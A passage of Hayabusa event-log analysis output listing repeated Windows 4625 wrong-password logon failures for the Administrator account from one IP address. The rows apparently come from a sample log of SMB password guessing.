+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXC3hYI1Gin59gvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQiozAIr9Jgklmks | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O598IvZRpbdU1liO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xlmYWrAnn3sUNSRk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aAAkO0uOGIq8zVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 26K4BIpgUbBNWbDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moW3Ts7edqoQ9XeU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8C4d3xE0QkWywbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1EgYFhtgrcjtcXM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7avpgQeA0KCIme9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFgmt3OEw4cDfPhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OqITdE5K63nJg9tg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBs4fYCiprxgDd43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBD0Q2szeURxMYA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: KPUi2NhPP92Rs3hy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PrbMf9E0fOuwIB8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 807zsxQ9WETO9YIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGMJKRYUlmijJV40 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv33to031A0fQzX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IT0bzycur7HXFeLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyY2K7tT0HgQ1ZL3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6aexuFPH6FyEZ1bN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o8Iojas6sznqlYUE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U2SnliYkmx59ACSM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2plWY1GZHilHv5Vh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIfmqihMJdPVz80p | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Odg692Eyde8md0t7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gsQNvf5HkRQnbDul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: il2DGq3bzfwGuJN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9OsQFOcIyougrx0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gR8wpQrGYzd4NrBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: KFjRsjWXbEPs9m1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wbjudOy3rWefzAIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Q4gc8keCTv2HeE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SmsaxHrHYuofUhAH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvhWasTJYmChfsNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DszGfEo9aua2y5UC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lZPScjxczbrcJuvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucpjxJV4rBXOxy4e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BmTtDfX05VsKFrON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhWSUkQhv089RSfJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8RXCiXQYgjuPO78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfB3u3Np38FOw6hc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9GcSmto4jdCIw6H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HsogJdHUcldt7JeH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IUbkohKtCy6joOBY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9ZFyYxBrKnz652Co | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQ2MHr71xALFHJqN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: cgjHOgEYRLQiJX75 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXLjSNCeDAaX4ttQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np6hwdqnWLJawVn9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: adqqChrYx3lZ0BAa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1GTXkOnNYTws1MiC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QUvFvCM6AJhKjXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PfTYbWC8IjW87th8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wLnE6zm5US4maK04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AV7taC7hYQdVjAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8MnnaSRs0bnYVlMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YgqavZ1SuNvX7RgH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IQvoIsfW0LhDit2Q | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 33IPGQXc1MarY30J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: II4Ly9LnkWlq60Ux | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wncfJC7kDSI7O9Ud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6XzbWef3PuzQK3FJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M5670HdNC6c8O56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Ea8FcddgLyV5o6oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjyhmKFdBNrHIvTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIF47pEWBMp6Nbym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6TO891WvJPkdjsct | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6cLnJYpHEzGAvhWG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gy6cFTrwrpRQFxfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gxz612Z88PMCKzAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GSPC8hibdZdyOcex | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6vlmykLeFmuhn81B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w4lEW9w53zMFPcc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:27.970 